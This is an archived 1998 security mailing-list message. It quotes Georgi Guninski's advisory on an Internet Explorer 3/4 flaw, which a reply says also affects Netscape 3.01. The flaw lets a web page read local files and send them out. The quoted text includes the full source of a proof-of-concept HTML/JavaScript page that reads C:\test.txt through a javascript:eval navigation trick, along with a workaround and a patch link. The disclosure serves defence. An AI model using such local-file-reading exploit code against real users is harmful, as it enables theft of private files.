Netscape Navigator Version 3.01 is vulnerable too... I didn't test any other netscape versions... At 04:33 98-09-05 -0400, Georgi Guninski wrote: >There is a bug in Internet Explorer 3, 4.0, 4.01 (for version information see Microsoft's info below), >which allows a specially designed web page to read text or HTML files from the user's computer >and send their contents to an arbitrary host, even if the user is behind firewall. The bug uses Javascript and >the file name and location must be known. > >Another way to exploit this bug is to send a specially designed message to an Outlook Express/IE4 user. > >Demonstration of this is available at: http://www.geocities.com/ResearchTriangle/1711/good-read.html > >Workaround: Disable Javascript. >Microsoft has released a patch at: http://www.microsoft.com/security/bulletins/ms98-013.htm > >Georgi Guninski >http://www.geocities.com/ResearchTriangle/1711 > >The source of the page: >----Cut here--- ><HTML> ><HEAD><TITLE>Read text/HTML file with Internet Explorer 4.01></TITLE></HEAD> ><BODY> >This demonstrates a bug in IE 4.01 under Windows 95 (don't know for other versions), which allows reading text or HTML file on the user's machine. ><B>Create the file c:\test.txt</B> and its contents are shown in a message box. The file may be sent to an arbitrary server even if behind a firewall. ><BR> >To test it, you need Javascript enabled. ><BR> >This file is created by <A HREF=http://www.geocities.com/ResearchTriangle/1711>Georgi Guninski.</A> > ><SCRIPT LANGUAGE="JAVASCRIPT"> > >alert("This page demonstrates reading the file C:\\test.txt (you may need to create a short file to view it)"); > > >var x=window.open('file://C:/test.txt'); >x.navigate("javascript:eval(\"var a=window.open('file://C:/test.txt');r=a.document.body.innerText;alert(r);\") "); > ></SCRIPT> ></BODY> ></HTML> > > >____________________________________________________________________ >Get free e-mail and a permanent address at http://www.netaddress.com/?N=1 > >
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:15:00 PDT